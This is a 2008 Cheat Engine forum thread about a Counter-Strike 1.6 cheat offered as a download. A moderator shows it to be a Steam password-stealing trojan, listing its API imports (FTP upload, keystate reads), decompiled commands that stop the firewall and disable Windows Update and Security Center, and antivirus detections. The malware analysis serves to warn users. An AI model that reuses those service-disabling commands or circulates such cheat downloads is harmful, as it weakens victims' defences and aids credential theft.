Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


CS 1.6 Ultimate Rep-(H)ack

 
Post new topic   Reply to topic    Cheat Engine Forum Index -> Trainers
View previous topic :: View next topic  
Author Message
Weaxer
Advanced Cheater
Reputation: 0

Joined: 18 Jul 2007
Posts: 55

PostPosted: Sat Feb 23, 2008 6:23 am    Post subject: CS 1.6 Ultimate Rep-(H)ack Reply with quote

This is a new CS trainer that I put together with my friends. Not made with CE though. It has;

- Aimbot
- Speed hack
- Wall hack
- No Clip
- Rear View (spectator sort of, can be used while playing)

DOWNLOAD

Rapidshare: http://rapidshare.de/files/38651774/CS_1.6_RepHack.rar.html
Speedyshare: http://www.speedyshare.com/779902842.html[/u]

_________________
Fuck off
Back to top
View user's profile Send private message
atom0s
Moderator
Reputation: 98

Joined: 25 Jan 2006
Posts: 5638
Location: 127.0.0.1

PostPosted: Sat Feb 23, 2008 7:00 am    Post subject: Reply with quote

I wouldn't trust this. Firstly, the DLL exports functions that have nothing to do with Counter Strike, let alone the fact that the dll is renamed from the original file which was ZLZ.dll (stolen?). Google for that DLL and you will find a few different results, the first few being trojans the others being debugging / bypasses found on MPC forums.

The second funny part is the injector itself is written in VB6, has the icon of an installer and has two resources that are also EXEs that get extracted.

The injector is also renamed from server.exe, even more suspicious. Which it connects to the internet and uses API that a loader should not even touch:

Code:
'VA: 4030C0
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
'VA: 40306C
Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, lpSource As Any, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, Arguments As Long) As Long
'VA: 403024
Private Declare Sub RegisterServiceProcess Lib "kernel32"()
'VA: 402FD4
Private Declare Function GetKeyState Lib "user32" Alias "GetKeyState" (ByVal nVirtKey As Long) As Integer
'VA: 402F90
Private Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer
'VA: 402F44
Private Declare Sub FtpPutFileA Lib "wininet.dll"()
'VA: 402F00
Private Declare Sub InternetConnectA Lib "wininet.dll"()
'VA: 402EB4
Private Declare Sub InternetCloseHandle Lib "wininet.dll"()
'VA: 402E4C
Private Declare Sub InternetOpenA Lib "wininet.dll"()
'VA: 402DF4
Private Declare Function GetForegroundWindow Lib "user32" Alias "GetForegroundWindow" () As Long
'VA: 402DA8
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
'VA: 402D54
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long
'VA: 402D08
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long


Following that, decompiling the loader showed some functions that do the following:

- Obtain the temp and system32 directory of the computer and locate comctrl32.ocx and regsvr32.exe
- Obtain the computer name.
- Extract the resources (the two exes) and load them.
- Uploads a file to the internet. (Probably your steam account info.)
- Connects to an FTP server to upload the file.

Some of the files extracted are:
C:\Steamacc.exe
C:\err_log.txt

The loader also writes to the registry and stops services:

loc_00404D99: var_7C = "cmd.exe /c net stop"
loc_00404E02: var_7C = "cmd.exe /c net stop SharedAccess"

loc_00404E4D: var_7C = "reg add"
loc_00404E54: var_00000084 = 8
loc_00404E5A: var_0000008C = "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess"
loc_00404E64: var_00000094 = 8
loc_00404E6A: var_0000009C = "/v Start /t REG_DWORD /d 0x4 /f"

loc_00404EE7: var_7C = "cmd.exe /c reg add"
loc_00404EEE: var_00000084 = 8
loc_00404EF4: var_0000008C = "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv"
loc_00404EFE: var_00000094 = 8
loc_00404F04: var_0000009C = "/v Start /t REG_DWORD /d 0x4 /f"

loc_00404F93: var_7C = "cmd.exe /c reg add"
loc_00404F9A: var_00000084 = 8
loc_00404FA0: var_0000008C = "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc"
loc_00404FAA: var_00000094 = 8
loc_00404FB0: var_0000009C = "/v Start /t REG_DWORD /d 0x4 /f"



The two resourced files are:

Resource #1: Packed with armadillo (so I'm not running it to unpack it.)
Resource #2: Appears to be COMDLG32.OCX

Resource #1 contains another resource thats packed which appears to be called STEAM_DLL which is probably either a keylogger or used to mimic one of the Steam DLLs.






And aside from self-analyzation:

Code:
 A-Squared     
Found Trojan-PSW.Win32.Steam.t
AntiVir    
Found TR/PSW.Steam.T
ArcaVir    
Found Trojan.Psw.Steam.T
Avast    
Found nothing
AVG Antivirus    
Found PSW.Generic5.SFH
BitDefender    
Found nothing
ClamAV    
Found Trojan.Spy-16734
CPsecure    
Found Troj.PSW.W32.Steam.ae
Dr.Web    
Found nothing
F-Prot Antivirus    
Found Possibly a new variant of W32/VB-Backdoor-ESVR-based!Maximus
F-Secure Anti-Virus    
Found Trojan-PSW.Win32.Steam.t
Fortinet    
Found nothing
Ikarus    
Found Trojan-PWS.Win32.Steam.t
Kaspersky Anti-Virus    
Found Trojan-PSW.Win32.Steam.t
NOD32    
Found probably a variant of Win32/PSW.Agent (probable variant)
Norman Virus Control    
Found nothing
Panda Antivirus    
Found nothing
Rising Antivirus    
Found Trojan.PSW.Win32.Steam.t
Sophos Antivirus    
Found Sus/ComPack (probable variant)
VirusBuster    
Found nothing
VBA32    
Found Trojan-PSW.Win32.Steam.t

_________________
- Retired.
Back to top
View user's profile Send private message
SunBeam
I post too much
Reputation: 28

Joined: 25 Feb 2005
Posts: 3322
Location: Romania

PostPosted: Sat Feb 23, 2008 7:10 am    Post subject: Reply with quote

"This is a new CS trainer that I put together with my friends."

It's always like that. You can tell by the first sentence in their post that it's a fake, stolen or not their work. Word of advice - packed .dll + hijacking of registry = not a hack or a trainer..
Back to top
View user's profile Send private message
podr
How do I cheat?
Reputation: 0

Joined: 27 Feb 2008
Posts: 2

PostPosted: Wed Feb 27, 2008 6:01 pm    Post subject: Reply with quote

I used to do some openGL hacking via DLL Files into the HL engine back in the day. This is just a Rip of a hack. Using these Non-Secure cheats is very dangerous, they call to memory locations in your computer and not only could you get banned by VAC, you can get your computer fucked. If anyone wants me to release a 'Cheat Engine CS Hack' that will be VAC Proof for quite a while, send me a pm and I will do it.
Back to top
View user's profile Send private message
samuri25404
Grandmaster Cheater
Reputation: 5

Joined: 04 May 2007
Posts: 960
Location: Why do you care?

PostPosted: Thu Feb 28, 2008 9:00 pm    Post subject: Reply with quote

SunBeam wrote:
"This is a new CS trainer that I put together with my friends."

It's always like that. You can tell by the first sentence in their post that it's a fake, stolen or not their work. Word of advice - packed .dll + hijacking of registry = not a hack or a trainer..


Oh it's a hack alright... Rolling Eyes

_________________
Wiccaan wrote:

Oh jeez, watchout I'm a bias person! Locked.


Auto Assembly Tuts:
In Depth Tutorial on AA
Extended
Back to top
View user's profile Send private message
Woofie134
Cheater
Reputation: 0

Joined: 28 Feb 2008
Posts: 40
Location: LOOK FOR YOURSELF (look behind the door!!)

PostPosted: Fri Feb 29, 2008 2:30 am    Post subject: Reply with quote

its a hack not a trainer mostly aim bot gets you banned and so does the rest so you shouldn't post it
Back to top
View user's profile Send private message
glasius
Expert Cheater
Reputation: 0

Joined: 31 Dec 2007
Posts: 109
Location: Scotland

PostPosted: Thu May 22, 2008 10:37 am    Post subject: Reply with quote

hmm i dont understand um any of that XD but im not getting it cos of what your searches found so ty
_________________

Back to top
View user's profile Send private message MSN Messenger
Labyrnth
Moderator
Reputation: 8

Joined: 28 Nov 2006
Posts: 6303

PostPosted: Thu May 22, 2008 11:02 am    Post subject: Reply with quote

glasius wrote:
hmm i dont understand um any of that XD but im not getting it cos of what your searches found so ty


Lets no quote large posts much less dig up old topics.
I already edited your post.....
Back to top
View user's profile Send private message
glasius
Expert Cheater
Reputation: 0

Joined: 31 Dec 2007
Posts: 109
Location: Scotland

PostPosted: Thu May 22, 2008 11:06 am    Post subject: Reply with quote

Labyrnth wrote:
glasius wrote:
hmm i dont understand um any of that XD but im not getting it cos of what your searches found so ty


Lets no quote large posts much less dig up old topics.
I already edited your post.....


Surprised never noticed this was old i found it on search looking for steam

_________________

Back to top
View user's profile Send private message MSN Messenger
Labyrnth
Moderator
Reputation: 8

Joined: 28 Nov 2006
Posts: 6303

PostPosted: Thu May 22, 2008 11:07 am    Post subject: Reply with quote

Thats ok man, i know when people dig old stuff it is from a search.
Back to top
View user's profile Send private message
007010
Advanced Cheater
Reputation: 0

Joined: 15 Apr 2008
Posts: 69
Location: RIGHT BEHIND YOU

PostPosted: Tue May 27, 2008 11:27 am    Post subject: OMFG Reply with quote

it contance 2 trogens and a bot in it could someone explan what a bot dose sorry for my n00byness but i used kaspersky to check it[/b]
_________________
HAY just p.m me if any trainers need making
Back to top
View user's profile Send private message
atom0s
Moderator
Reputation: 98

Joined: 25 Jan 2006
Posts: 5638
Location: 127.0.0.1

PostPosted: Tue May 27, 2008 4:42 pm    Post subject: Reply with quote

Bots are used to simulate human actions.
_________________
- Retired.
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> Trainers All times are GMT - 6 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum



Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)